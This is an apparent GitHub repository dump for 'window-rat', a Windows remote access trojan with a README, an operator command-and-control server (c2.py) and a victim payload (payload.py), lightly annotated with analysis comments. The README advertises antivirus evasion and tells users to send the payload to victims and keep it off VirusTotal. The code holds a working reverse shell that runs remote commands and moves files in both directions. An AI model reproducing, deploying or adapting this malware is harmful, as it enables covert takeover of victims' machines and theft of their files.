├── LICENSE ├── README.md ├── c2.py └── payload.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 sikander 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # window-rat: 2 | 3 | # NOTE: 4 | Use new Cross Plaftorm FUD RAT https://github.com/machine1337/pyFUD 5 | # Introduction: 6 | A Fully Undectable Window RAT that bypass window 10 Defender protection and also bypass 99.9% of other antivirus protections. 7 | 8 | ![c2a](https://user-images.githubusercontent.com/82051128/201597249-39a6b071-1277-4bbf-a720-f9d1aa537d0e.png) 9 | 10 | # C2 Server Requirements:- 11 | pip install termcolor 12 | pip install pyfiglet 13 | 14 | # Installation: 15 | 1. 
git clone https://github.com/machine1337/window-rat 16 | 2. pip install -r requirements.txt 17 | 3. python3 c2.py (your command server from where u will handle targets) 18 | 4. payload.py (your payload u will send to victim) 19 | 5. IP and Port in both payload.py and server.py Must be same 20 | 21 | # Usage: 22 | 1. python3 c2.py 23 | 2. Now enter IP (your IP or server in which u want to get reverse shell) 24 | 3. Now enter PORT (which port u want to connect) 25 | 4. Listener will be started 26 | 5. Now go to payload.py line no. 36 and put ip and port of server s.connect(('ipserver', portserver)) 27 | 6. test the payload.py on victim system 28 | 29 | # Commands:- 30 | -> C2 SERVER COMMANDS: 31 | ![c21](https://user-images.githubusercontent.com/82051128/201598677-206191a5-c671-4007-9f9a-402db123ec99.png) 32 | 33 | -> After Got Connection (type help) 34 | ![shellc2](https://user-images.githubusercontent.com/82051128/201598869-0b6fe1c8-9ed6-4e4b-997d-42f66a59f0ca.png) 35 | 36 | # Warning: 37 | 1. Don't Upload Any Payloads To VirusTotal.com Bcz This tool will not work 38 | with Time. 39 | 2. Virustotal Share Signatures With AV Comapnies. 40 | 3. Again Don't be an Idiot! 41 | 42 | # Features: 43 | 1. Very Simple And Fully Undectable RAT For Windows 44 | 2. Multi Client Handling 45 | 3. Persistent Shell 46 | 4. Upload File 47 | 5. Download File 48 | 4. Once Victim Execute the Payload And We got Shell Then Victim Can't Remove the payload 49 | Until the Shell is Open In Attacker System. 50 | 5. U can Convert payload.py to exe using pyinstaller tool in windows. 51 | 52 | # Note: 53 | Don't upload exe format to virustotal as I have already uploaded 54 | Ps payload to virustotal. or u can check this file on nodistribute.com because they 55 | don't submit signatures to antivirus companies. 56 | Reason: They will submit this payload to different AV companies 57 | And as a result this script will not work w.r.t time. 
58 | # Contact: 59 | Telegram Group: https://t.me/machine1337 60 | 61 | # Donations: 62 | BTC Address: 3Dvzx2RKMR731VSEPXXgPyBq6Ln4JJdYPD 63 | 64 | 65 | 66 | # Warning: 67 | Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act. 68 | 69 | 70 |
--------------------------------------------------------------------------------
/c2.py:
--------------------------------------------------------------------------------
# Operator-side listener of this sample, annotated for analysis.
#
# What the file does, as shown below:
#   * binds a TCP listener on an address/port typed in at start-up and keeps
#     every accepted socket in the module-level lists `targets` / `ips`;
#   * exchanges commands and results as json.dumps()-encoded values over the
#     raw socket, and file contents as raw bytes with no length prefix;
#   * performs no authentication or encryption anywhere in this file, so any
#     peer that connects is recorded as a session and the traffic is readable
#     to network monitoring.
#
# NOTE(review): the listing lost its line breaks and indentation. Nesting below
# is reconstructed from statement order, and whitespace inside string literals
# is reproduced as the listing shows it -- confirm against the original file.
import socket
import json
import os
import threading
print("[*] Checking Requirements Module.....")
try:
    import termcolor
except ImportError:
    # Installs an unpinned package through the shell at import time; whichever
    # `pip` and package index the environment resolves are trusted implicitly.
    os.system("pip install termcolor -q -q -q")
    import termcolor
from termcolor import colored
try:
    import pyfiglet
except ImportError:
    # Same runtime-install pattern as above, for pyfiglet.
    os.system("pip install pyfiglet -q -q -q")
    import pyfiglet
def logo():
    """Print the pyfiglet banner and a one-line usage hint."""
    ascii_banner = pyfiglet.figlet_format(" {C2 S3RV3R}").upper()
    print(colored(ascii_banner.rstrip("\n"), 'cyan', attrs=['bold']))
    print(colored(" Type:- usage \n", 'magenta', attrs=['bold']))
    print(colored(" \n", 'magenta', attrs=['bold']))

def reliable_recv(target):
    """Read from `target` until the accumulated text parses as JSON.

    Chunks of up to 1024 bytes are decoded, right-stripped and appended to a
    buffer; json.loads() is retried after every chunk. Message boundaries are
    therefore defined only by "the buffer is valid JSON". This function sets
    no timeout and puts no cap on the buffer.
    """
    data = ''
    while True:
        try:
            data = data + target.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            # json decode errors and UnicodeDecodeError are both ValueError
            # subclasses, so either one just triggers another read.
            continue

def reliable_send(target, data):
    """JSON-encode `data` and write it to `target` with a single send()."""
    jsondata = json.dumps(data)
    target.send(jsondata.encode())

def upload_file(target, file_name):
    """Send the raw bytes of the local file `file_name` to `target`.

    The path comes from the operator's command line; nothing is framed or
    length-prefixed, so on the wire this is an undelimited byte stream.
    """
    f = open(file_name, 'rb')
    target.send(f.read())

def download_file(target, file_name):
    """Write bytes received from `target` into the local file `file_name`.

    The end of a transfer is inferred from one second of silence on the socket
    (or the peer closing), not from any marker or size field in the data.
    """
    f = open(file_name, 'wb')
    target.settimeout(1)
    # This first recv() sits outside the try below, so a timeout here is not
    # handled inside this function.
    chunk = target.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = target.recv(1024)
        except socket.timeout as e:
            break
    target.settimeout(None)
    f.close()


def target_communication(target, ip):
    """Interactive per-session prompt for one connected socket.

    Every typed line is sent to the remote end first and only then interpreted
    locally, so 'help', 'clear' and 'background' also cross the wire. Only
    the final `else` branch waits for a JSON reply.
    """
    count = 0  # assigned but not used anywhere in this function
    while True:
        command = input('* Victim~%s: ' % str(ip))
        reliable_send(target, command)
        if command == 'quit':
            break
        elif command == 'background':
            break
        elif command == 'clear':
            os.system('clear')
        elif command[:3] == 'cd ':
            pass
        elif command[:6] == 'upload':
            upload_file(target, command[7:])
        elif command[:8] == 'download':
            download_file(target, command[9:])
        elif command == 'help':
            # As parenthesised in the listing, 'green' is a second argument to
            # print(), not a colour argument to colored().
            print(termcolor.colored('''\n
quit --> Quit Session With The Target
clear --> Clear The Screen
cd *Directory Name* --> Changes Directory On Target System
upload *file name* --> Upload File To The target Machine
download *file name* --> Download File From Target Machine'''),'green')
        else:
            result = reliable_recv(target)
            print(result)

def restart(self) -> bool:
    # Defined at module level with a `self` parameter and calls reliable_send()
    # with the wrong number of arguments; the 'res' command below invokes it as
    # restart(), so as listed this path raises TypeError instead of sending
    # anything.
    reliable_send(['res'])
    return reliable_send()
def accept_connections():
    """Background accept loop (run on thread `t1`).

    Polls the listening socket with a 1-second timeout until `stop_flag` is
    set, appending each new connection to `targets` and its address to `ips`.
    `stop_flag`, `sock`, `targets` and `ips` are module globals assigned in the
    start-up block below. No check is made on who is connecting.
    """
    while True:
        if stop_flag:
            break
        sock.settimeout(1)
        try:
            target, ip = sock.accept()
            targets.append(target)
            ips.append(ip)
            print(termcolor.colored(str(ip) + ' has connected!', 'green'))
        except:
            # Bare except: accept timeouts and every other error are dropped
            # silently.
            pass
os.system('cls' if os.name == 'nt' else 'clear')
logo()
try:
    # Listener address and port are taken from interactive input.
    abc = input(termcolor.colored("[*] Enter Your ip: ", 'blue'))
    cde = int(input(termcolor.colored("[*] Enter Your Port: ", 'cyan')))
    targets = []
    ips = []
    stop_flag = False
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((f'{abc}', cde))
    sock.listen(5)
    t1 = threading.Thread(target=accept_connections)
    t1.start()
    print(termcolor.colored('[+] Listening For The Incoming Connections ...', 'yellow'))
    print()
    try:
        # Top-level operator prompt: session listing, selection and teardown.
        while True:
            command = input('[+] C2@Server:- ')
            if command == 'targets':
                counter = 0
                for ip in ips:
                    print('Session ' + str(counter) + ' --- ' + str(ip))
                    counter += 1
            elif command == 'clear':
                os.system('clear')
            elif command == 'cls':
                os.system('cls')
            elif command == 'usage':
                print(termcolor.colored('''\n
===Command and Control (C2) Usage===
targets --> Prints Active Sessions
session *session num* --> Will Connect To Session (background to return)
clear --> Clear Terminal Screen
cls --> clear the windows screen
exit --> Quit ALL Active Sessions and Closes C2 Server!!
kill *session num* --> Issue 'quit' To Specified Target Session
sendall *command* --> Sends The *command* To ALL Active Sessions (sendall notepad)
\n''', 'cyan'))
            elif command == 'res':
                restart()
            elif command[:7] == 'session':
                try:
                    num = int(command[8:])
                    tarnum = targets[num]
                    tarip = ips[num]
                    target_communication(tarnum, tarip)
                except:
                    # Bare except: any error raised during the session, not
                    # only a bad index, ends up printing this message.
                    print('[-] No Session Under That ID Number')
            elif command == 'exit':
                for target in targets:
                    reliable_send(target, 'quit')
                    target.close()
                sock.close()
                stop_flag = True
                t1.join()
                break
            elif command[:4] == 'kill':
                # No error handling in this branch; the enclosing try catches
                # only KeyboardInterrupt.
                targ = targets[int(command[5:])]
                ip = ips[int(command[5:])]
                reliable_send(targ, 'quit')
                targ.close()
                targets.remove(targ)
                ips.remove(ip)
            elif command[:7] == 'sendall':
                # Forwards the whole typed line, 'sendall' prefix included, to
                # every tracked socket and does not read any reply.
                x = len(targets)
                print(x)
                i = 0
                try:
                    while i < x:
                        tarnumber = targets[i]
                        print(tarnumber)
                        reliable_send(tarnumber, command)
                        i += 1
                except:
                    print('Failed')
            else:
                print(termcolor.colored('[!!] Command Doesnt Exist', 'red'))
    except KeyboardInterrupt:
        print("\nYou Did something Wrong! Restart the C2")
        exit()

except KeyboardInterrupt:
    print(termcolor.colored("\nYou Pressed The Exit Button!", 'red'))
    quit()

--------------------------------------------------------------------------------
/payload.py:
--------------------------------------------------------------------------------
# Client side of this sample, annotated for analysis.
#
# Behaviour visible in this file that host and network monitoring can key on:
#   * an outbound TCP connection to one fixed endpoint, attempted after a
#     4-second sleep and retried on failure (see connection());
#   * server-supplied strings run through subprocess.Popen(..., shell=True)
#     with stdin/stdout/stderr piped, i.e. the Python process (or an executable
#     built from it, as the README suggests) spawning shell child processes;
#   * commands and command output carried as plain JSON strings, unencrypted;
#   * files opened for write/read at server-named paths, relative to a working
#     directory the server can change through os.chdir().
#
# Nothing in this file implements obfuscation, packing or evasion, and there is
# no autostart/service/scheduled-task persistence here; the only retry logic is
# the reconnect loop. The README's "undetectable" claim is not backed by code
# shown in this listing.
#
# NOTE(review): the listing lost its line breaks and indentation; nesting below
# is reconstructed from statement order -- confirm against the original file.
import socket
import json
import subprocess
import time
import os
def reliable_send(data):
    """JSON-encode `data` and write it to the module-level socket `s`."""
    jsondata = json.dumps(data)
    s.send(jsondata.encode())
def reliable_recv():
    """Read from `s` until the accumulated text parses as JSON; same framing as c2.py."""
    data = ''
    while True:
        try:
            data = data + s.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue
def download_file(file_name):
    """Write bytes received on `s` to `file_name` until a 1-second recv timeout.

    Reached from the server's 'upload' command, so the path written on this host
    is chosen by the remote end.
    """
    f = open(file_name, 'wb')
    s.settimeout(1)
    chunk = s.recv(1024)
    while chunk:
        f.write(chunk)
        try:
            chunk = s.recv(1024)
        except socket.timeout as e:
            break
    s.settimeout(None)
    f.close()
def upload_file(file_name):
    """Send the raw bytes of local file `file_name` over `s`.

    Reached from the server's 'download' command: any file this process can
    read, at a path chosen by the remote end, leaves the host unframed.
    """
    f = open(file_name, 'rb')
    s.send(f.read())
def connection():
    """Sleep 4 seconds, connect `s` to the configured endpoint and run shell().

    'ipserver' is a literal placeholder and `portserver` is a bare name that is
    not defined in this file; README step 5 has the user replace both. Any
    exception is swallowed by the bare except, which re-enters connection()
    recursively rather than looping.
    """
    while True:
        time.sleep(4)
        try:
            s.connect(('ipserver', portserver))
            shell()
            s.close()
            break
        except:
            connection()
def shell():
    """Command loop: receive one JSON string from the server and act on it.

    Anything that is not a recognised keyword reaches the final `else` and is
    executed verbatim through the platform shell.
    """
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        elif command == 'background':
            pass
        elif command == 'help':
            pass
        elif command == 'clear':
            pass
        elif command[:3] == 'cd ':
            os.chdir(command[3:])
        # NOTE(review): this `if` starts a second chain in the listing. It
        # compares a 3-character slice with the 4-character string 'res ', so as
        # written it never matches. Presumably it sits at the same level as the
        # chain above, in which case commands handled there also fall through to
        # the branches below -- confirm against the original indentation.
        if command[:3] == 'res ':
            reliable_send(True)
            break
        elif command[:6] == 'upload':
            download_file(command[7:])
        elif command[:8] == 'download':
            upload_file(command[9:])
        elif command[:7] == 'sendall':
            # Runs the text after the 'sendall ' prefix through the shell and
            # does not collect or return its output.
            subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE)
        else:
            # The received string is passed unmodified to the shell; stdout and
            # stderr are read to completion and returned as one JSON string.
            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE)
            result = execute.stdout.read() + execute.stderr.read()
            result = result.decode()
            reliable_send(result)

# One module-level socket shared by every helper above.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def catc():
    """Entry point: run connection() and exit quietly on Ctrl-C."""
    try:
        connection()
    except KeyboardInterrupt:
        quit()
catc()


--------------------------------------------------------------------------------